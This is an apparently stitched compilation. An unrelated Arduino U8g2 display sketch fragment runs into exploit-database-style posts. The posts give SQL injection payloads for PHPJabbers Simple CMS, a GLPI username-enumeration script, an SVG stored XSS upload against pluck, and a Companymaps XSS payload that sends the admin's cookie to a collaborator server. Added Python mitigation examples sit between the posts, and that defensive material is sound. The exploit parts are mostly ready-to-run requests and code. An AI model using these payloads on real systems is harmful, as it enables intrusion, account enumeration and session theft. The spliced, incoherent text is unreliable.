  //pinMode(16, OUTPUT);
  //digitalWrite(16, 0);

  /* U8g2 Project: LC7981 Test Board, connect RW to GND */
  //pinMode(17, OUTPUT);
  //digitalWrite(17, 0);

  /* U8g2 Project: Pax Instruments Shield: Enable Backlight */
  //pinMode(6, OUTPUT);
  //digitalWrite(6, 0);

  u8g2.begin();

  /* select a font */
  //u8g2.setFont(u8g2_font_wqy12_t_chinese1);  // two unknown glyphs
  //u8g2.setFont(u8g2_font_wqy12_t_chinese3);  // two unknown glyphs
  //u8g2.setFont(u8g2_font_wqy12_t_gb2312a);   // ';' is missing
  //u8g2.setFont(u8g2_font_wqy12_t_gb2312b);   // all glyphs available
  u8g2.setFont(FONT);

  /* calculate the length of the text in lines */
  total_lines = u8x8_GetStringLineCnt(c_str);

  /* get the height of the glyphs */
  glyph_height = u8g2.getMaxCharHeight();

  /* calculate the height of the text in pixel */
  total_height = (uint16_t)total_lines * (uint16_t)glyph_height;

  /* calculate how many lines must be drawn on the screen */
  lines_per_draw = u8g2.getDisplayHeight() / glyph_height;
  lines_per_draw += 2;

  /* start at the top of the text */
  top_window_pos = 0;
}

void loop(void) {
  start_line = top_window_pos / glyph_height;
  top_offset = top_window_pos % glyph_height;

  line_cnt = total_lines - start_line;
  if (line_cnt > lines_per_draw)
    line_cnt = lines_per_draw;

  u8g2.firstPage();
  do {
    for (i = 0; i < line_cnt; i++) {
      /* copy a line of the text to the local buffer */
      u8x8_CopyStringLine(buf, i + start_line, c_str);

      /* draw the content of the local buffer */
      u8g2.drawUTF8(0, i * glyph_height - top_offset + glyph_height, buf);
    }
  } while (u8g2.nextPage());

  delay(SCROLL_DELAY);
  top_window_pos += SCROLL_DELTA;
}
  22. # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Request ###

GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

### Parameter & Payloads ###

Parameter: column (GET)

Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
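Added mitigation example, not code from the post or the vendor: the injection point here is a sort column that ends up in an ORDER BY clause, where bound parameters cannot help, so the fix is an allowlist of sortable identifiers plus integer-checked paging. The table, column names and SQLite stand-in are assumptions; the two payload constants are the ones listed above.

```python
import sqlite3

# Columns a client may legitimately sort the file list by, and the only two
# directions ORDER BY accepts (assumed names). Anything else is rejected.
SORTABLE_COLUMNS = {"id", "name", "created", "modified"}
DIRECTIONS = {"ASC", "DESC"}


def build_file_query(column, direction, page, row_count):
    """Return (sql, params) for the file listing. column and direction are
    matched against allowlists and substituted as quoted identifiers; page and
    rowCount are converted to bounded integers and bound as parameters."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsortable column: {column!r}")
    direction = direction.upper()
    if direction not in DIRECTIONS:
        raise ValueError(f"bad direction: {direction!r}")
    page = int(page)
    row_count = int(row_count)
    if page < 0 or not 1 <= row_count <= 100:
        raise ValueError("page/rowCount out of range")
    sql = f'SELECT id, name, created FROM files ORDER BY "{column}" {direction} LIMIT ? OFFSET ?'
    return sql, (row_count, page * row_count)


def list_files(conn, params):
    """Run the listing for a parsed query-string dict such as the request above:
    {'column': 'created', 'direction': 'DESC', 'page': '0', 'rowCount': '10'}."""
    sql, bound = build_file_query(params["column"], params["direction"],
                                  params.get("page", 0), params.get("rowCount", 10))
    return conn.execute(sql, bound).fetchall()


def is_rejected(params):
    """True when the allowlist throws the request out before any SQL is built."""
    try:
        build_file_query(params["column"], params["direction"],
                         params.get("page", 0), params.get("rowCount", 10))
    except ValueError:
        return True
    return False


def demo_db():
    """Constructed in-memory table standing in for the CMS files table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE files (id INTEGER, name TEXT, created TEXT)")
    conn.executemany("INSERT INTO files VALUES (?, ?, ?)",
                     [(1, "a.txt", "2023-01-01"), (2, "b.txt", "2023-03-01"), (3, "c.txt", "2023-02-01")])
    return conn


# The two sqlmap payloads from the post, as they would arrive in the column parameter.
BOOLEAN_PAYLOAD = {"column": "(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))", "direction": "DESC"}
ERROR_PAYLOAD = {"column": "2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))", "direction": "DESC"}
```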
  23. # Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz

import requests
from bs4 import BeautifulSoup

# Send a GET request to the page to receive the CSRF token and the session cookie
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')

# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')

# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})

# Extract the CSRF token if it exists
csrf_token = None
if csrf_input:
    csrf_token = csrf_input['value']

# Extract the session cookie
session_cookie_value = None
if response.cookies:
    session_cookie_value = next(iter(response.cookies.values()))

# Set the custom URL where the GLPI recover-password form is located
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"

headers = {"User-Agent": "Windows NT 10.0",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
           "Accept-Language": "en-US,en;q=0.5",
           "Accept-Encoding": "gzip, deflate",
           "Content-Type": "application/x-www-form-urlencoded",
           "Origin": "http://127.0.0.1",
           "Connection": "close",
           "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1",
           "Upgrade-Insecure-Requests": "1",
           "Sec-Fetch-Dest": "document",
           "Sec-Fetch-Mode": "navigate",
           "Sec-Fetch-Site": "same-origin",
           "Sec-Fetch-User": "?1"}

# Open the email list file and read each line
with open('emails.txt', 'r') as f:
    email_list = f.readlines()

# Loop through the email list and make a POST request for each email
for email in email_list:
    email = email.strip()
    if not email:
        continue
    data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
    cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}
    freq = requests.post(url, headers=headers, cookies=cookies, data=data)

    # Do a new GET request to get the updated CSRF token and session cookie for the next iteration
    response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
    soup = BeautifulSoup(response.content, 'html.parser')
    csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
    if csrf_input:
        csrf_token = csrf_input['value']
    session_cookie_value = None
    if response.cookies:
        session_cookie_value = next(iter(response.cookies.values()))

    # Parse the response and grep the matching e-mails
    soup = BeautifulSoup(freq.content, 'html.parser')
    div_center = soup.find('div', {'class': 'center'})
    message = div_center.text.strip() if div_center else ''
    Result = f"Email: {email}, Result: {message}"
    if "An email has been sent to your email address. The email contains information for reset your password." in Result:
        print("\033[1;32m Email Found! -> " + Result)
  24. Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs: XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

steps:

1. create .svg file.
2. svg file content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>

3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)

poc request

POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close

------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>

------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--

4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
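Added upload-handling example, not code from the post or from pluck: it inspects an SVG for active content (script and foreignObject elements, on* handlers, javascript: URLs) and, for files that pass, returns the response headers that make /files/<name> download rather than render in the site's origin. The hypothetical accept_upload handler and its header set are assumptions; POC_SVG is the file from the post, CLEAN_SVG is a constructed control.

```python
import xml.etree.ElementTree as ET

# The uploaded file from the PoC above, reproduced as a test input.
POC_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>"""

# Constructed harmless SVG used as the control case.
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
<polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""


def local_name(tag):
    """Strip an XML namespace prefix like {http://www.w3.org/2000/svg}script."""
    return tag.rsplit("}", 1)[-1].lower()


def svg_active_content(data):
    """Return the reasons an SVG must not be served inline; an empty list means
    no script element, event-handler attribute, javascript: URL or foreignObject
    was found. Malformed XML is reported as a finding rather than passed."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as e:
        return [f"not well-formed XML: {e}"]
    if local_name(root.tag) != "svg":
        return ["root element is not <svg>"]
    findings = []
    for el in root.iter():
        name = local_name(el.tag)
        if name in ("script", "foreignobject"):
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            a = local_name(attr)
            if a.startswith("on"):
                findings.append(f"event handler {a} on <{name}>")
            elif a == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{name}>")
    return findings


def accept_upload(filename, data):
    """Hypothetical decision for a .svg upload: reject active content; otherwise
    store it and serve it as an attachment with a restrictive CSP, so that opening
    /files/<name> does not execute in the application's origin.
    Returns (accepted, headers) on success or (False, findings) on rejection."""
    if not filename.lower().endswith(".svg"):
        return False, ["only .svg is handled here"]
    findings = svg_active_content(data)
    if findings:
        return False, findings
    headers = {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'",
        "X-Content-Type-Options": "nosniff",
    }
    return True, headers
```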
  25. # Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*

1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admin's cookie is the value of the c parameter

In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
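Added output-encoding example covering this post and post 20 above (the Simple CMS section-name XSS); it is not code from either post or product. It renders the two stored values the way the vulnerable pages do, in an attribute context and in an element-content context, beside the html.escape version, and checks which tags survive. The templates are assumptions; the payloads are the ones from the posts, with the token payload URL-decoded.

```python
import html
import re

# Payloads from the two posts, reproduced as constructed inputs.
SECTION_NAME_PAYLOAD = '"><img src=x onerror=alert("Stored")>'
TOKEN_PAYLOAD = "<script>new Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>"


def render_section_form_unsafe(section_name):
    """Pattern behind the Simple CMS bug (assumed template): the stored value is
    dropped into a value="" attribute unencoded, so a leading "> closes both the
    attribute and the tag and the rest is parsed as new markup."""
    return f'<input type="text" name="section_name" value="{section_name}">'


def render_section_form(section_name):
    """Attribute context: html.escape(quote=True) turns " into &quot; and < into &lt;,
    so the value can never terminate the attribute or open a tag."""
    return f'<input type="text" name="section_name" value="{html.escape(section_name, quote=True)}">'


def render_audit_row_unsafe(ip, token):
    """Pattern behind the Companymaps bug (assumed template): a logged request
    parameter echoed into the admin audit log as-is."""
    return f"<tr><td>{ip}</td><td>{token}</td></tr>"


def render_audit_row(ip, token):
    """Element-content context: escaping < > & shows the logged payload as text,
    which is exactly what an auditor wants to see."""
    return f"<tr><td>{html.escape(ip)}</td><td>{html.escape(token)}</td></tr>"


TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")


def tags_in(markup):
    """Sorted set of tag names a browser would see in the markup: a quick check
    that only the template's own tags survive, not the attacker's img or script."""
    return sorted({t.lower() for t in TAG_RE.findall(markup)})
```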